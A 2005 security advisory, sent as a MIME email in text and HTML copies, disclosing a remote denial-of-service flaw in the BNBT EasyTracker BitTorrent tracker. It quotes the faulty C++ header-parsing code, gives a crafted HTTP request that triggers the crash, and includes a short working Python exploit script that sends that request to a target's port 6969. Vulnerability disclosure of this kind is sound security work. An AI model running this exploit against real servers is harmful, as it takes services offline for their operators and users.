------=_Part_1314_25115579.1125371502728
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

BNBT EasyTracker Remote Denial of Service Vulnerability

by Sowhat

Last Update:2005.08.30

http://secway.org/advisory/AD20050830.txt

Vendor:

http://bnbteasytracker.sourceforge.net/

Product Affected:

7.7r3.2004.10.27 and below

Overview:

BNBT was written by Trevor Hogan. BNBT is a complete port=20
of the original Python BitTorrent tracker to C++ for speed
and efficiency. BNBT also offers many additional features
beyond the original Python BitTorrent tracker, plus it's=20
easy to use and customizable. BNBT is covered under the GNU
Lesser General Public License (LGPL).

A Denial of Service vulnerability exists within BNBT which
allows for an attacker to cause the BNBT to stop responding.=20

Details:

A specifically crafted HTTP request will cause the BNBT=20
Server stop responding.

Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
will reproduce the problem. It seems that the bug is located
in client.cpp, "//grab headers" section. And it is something
like " 1-2 =3D -1" and similar to memcpy(-1) ?=20

// grab headers

string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine =3D m_strReceiveBuf.find( "\r\n\r\n" );

strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),=20
iDoubleNewLine - iNewLine - strlen( "\r\n" ) );

while( 1 )
{
string :: size_type iSplit =3D strTemp.find( ":" );
string :: size_type iEnd =3D strTemp.find( "\r\n" );

if( iSplit =3D=3D string :: npos )
{
UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );

break;
}

string strKey =3D strTemp.substr( 0, iSplit );
string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit =
-=20
strlen( "\r\n" ) );//Bug here ??

rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );

strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" ) );

if( iEnd =3D=3D string :: npos )
break;
}

However, I am not quite sure about that and it seems that
it is only a D.O.S so I havnt deep into it.=20
=20
Exploit:

//BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discoverd and coded by Sowhat
# http://secway.org

# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/

import sys
import string
import socket

if (len(sys.argv) !=3D 2):
print "\nUsage: " + sys.argv[0] + " TargetIP\n"
print "##################################################################"
print "# #"
print "# BNBT EasyTracker Remote D.O.S Exploit #"
print "# Bug discoverd and coded by Sowhat #"
print "# http://secway.org #"
print "##################################################################"
sys.exit(0)

host =3D sys.argv[1]
port =3D 6969


payload =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"

s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.send(payload)


WORKAROUND:

No WORKAROUND this time.
plz check the vendor's website for update
Maybe there will be a patch later (?)

Vendor Response:

2005.08.22 Vendor notified via Webform,no email found=20
2005.08.30 Vendor no response. Advisory Released

"Life is like a bug, Do you know how to exploit it ?"

------=_Part_1314_25115579.1125371502728
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

<p>BNBT EasyTracker Remote Denial of Service Vulnerability</p>
<p>by Sowhat</p>
<p>Last Update:2005.08.30</p>
<p><a href=3D"http://secway.org/advisory/AD20050830.txt">http://secway.org/=
advisory/AD20050830.txt</a></p>
<p>Vendor:</p>
<p><a href=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytrack=
er.sourceforge.net/</a></p>
<p>Product Affected:</p>
<p>7.7r3.2004.10.27 and below</p>
<p>Overview:</p>
<p>BNBT was written by Trevor Hogan. BNBT is a complete port <br>of the ori=
ginal Python BitTorrent tracker to C++ for speed<br>and efficiency. BNBT al=
so offers many additional features<br>beyond the original Python BitTorrent=
 tracker, plus it's=20
<br>easy to use and customizable. BNBT is covered under the GNU<br>&nbsp;Le=
sser General Public License (LGPL).</p>
<p>A Denial of Service vulnerability exists within BNBT which<br>allows for=
 an attacker to cause the BNBT to stop responding. </p>
<p>Details:</p>
<p>A specifically crafted HTTP request will cause the BNBT <br>Server stop =
responding.</p>
<p>Sending a request like &quot;GET /index.htm HTTP/1.1\r\n:\r\n\r\n&quot;<=
br>will reproduce the problem. It seems that the bug is located<br>in clien=
t.cpp, &quot;//grab headers&quot; section. And it is something<br>like &quo=
t; 1-2 =3D -1&quot; and similar to memcpy(-1) ?=20
</p>
<p>// grab headers</p>
<p>&nbsp;string :: size_type iNewLine =3D m_strReceiveBuf.find( &quot;\r\n&=
quot; );<br>&nbsp;string :: size_type iDoubleNewLine =3D m_strReceiveBuf.fi=
nd( &quot;\r\n\r\n&quot; );</p>
<p>&nbsp;strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( &quot;\r\n&=
quot; ), iDoubleNewLine - iNewLine - strlen( &quot;\r\n&quot; ) );</p>
<p>&nbsp;while( 1 )<br>&nbsp;{<br>&nbsp;&nbsp;string :: size_type iSplit =
=3D strTemp.find( &quot;:&quot; );<br>&nbsp;&nbsp;string :: size_type iEnd =
=3D strTemp.find( &quot;\r\n&quot; );</p>
<p>&nbsp;&nbsp;if( iSplit =3D=3D string :: npos )<br>&nbsp;&nbsp;{<br>&nbsp=
;&nbsp;&nbsp;UTIL_LogPrint( &quot;client warning - malformed HTTP request (=
bad header)\n&quot; );</p>
<p>&nbsp;&nbsp;&nbsp;break;<br>&nbsp;&nbsp;}</p>
<p>&nbsp;&nbsp;string strKey =3D strTemp.substr( 0, iSplit );<br>&nbsp;&nbs=
p;string strValue =3D strTemp.substr( iSplit + strlen( &quot;: &quot; ), iE=
nd - iSplit - strlen( &quot;\r\n&quot; ) );//Bug here ??</p>
<p>&nbsp;&nbsp;rqst.mapHeaders.insert( pair&lt;string, string&gt;( strKey, =
strValue ) );</p>
<p>&nbsp;&nbsp;strTemp =3D strTemp.substr( iEnd + strlen( &quot;\r\n&quot; =
) );</p>
<p>&nbsp;&nbsp;if( iEnd =3D=3D string :: npos )<br>&nbsp;&nbsp;&nbsp;break;=
<br>&nbsp;}</p>
<p>However, I am not quite sure about that and it seems that<br>it is only =
a D.O.S so I havnt deep into it. <br>&nbsp;</p>
<p>Exploit:</p>
<p>//BNBTDOS.py<br># BNBT EasyTracker Remote D.O.S Exploit<br># Bug discove=
rd and coded by Sowhat<br># <a href=3D"http://secway.org/">http://secway.or=
g</a></p>
<p># Version 7.7r3.2004.10.27 and below<br># the BNBT project:&nbsp; <a hre=
f=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytracker.source=
forge.net/</a><br>&nbsp;<br>import sys<br>import string<br>import socket</p=
>
<p>if (len(sys.argv) !=3D 2):<br>&nbsp;print &quot;\nUsage: &quot; + sys.ar=
gv[0] + &quot; TargetIP\n&quot;<br>&nbsp;print &quot;######################=
############################################&quot;<br>&nbsp;print &quot;#&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
; #&quot;
<br>&nbsp;print &quot;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p; BNBT EasyTracker Remote D.O.S Exploit&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #&quot;<br>&n=
bsp;print &quot;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p; Bug discoverd and coded by Sowhat&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
 #&quot;<br>&nbsp;print &quot;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href=3D"http://secway.org/">
http://secway.org</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #&quot;<br>=
&nbsp;print &quot;#########################################################=
#########&quot;<br>&nbsp;sys.exit(0)</p>
<p>host =3D sys.argv[1]<br>port =3D 6969</p>
<p><br>payload&nbsp; =3D &quot;GET /index.htm HTTP/1.1\r\n:\r\n\r\n&quot;</=
p>
<p>s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)<br>s.connect((hos=
t,port))<br>s.send(payload)</p>
<p><br>WORKAROUND:</p>
<p>No WORKAROUND this time.<br>plz check the vendor's website for update<br=
>Maybe there will be a patch later (?)</p>
<p>Vendor Response:</p>
<p>2005.08.22 Vendor notified via Webform,no email found <br>2005.08.30 Ven=
dor no response. Advisory Released</p>
<p>&quot;Life is like a bug, Do you know how to exploit it ?&quot;</p>
<p><br>&nbsp;</p>

------=_Part_1314_25115579.1125371502728--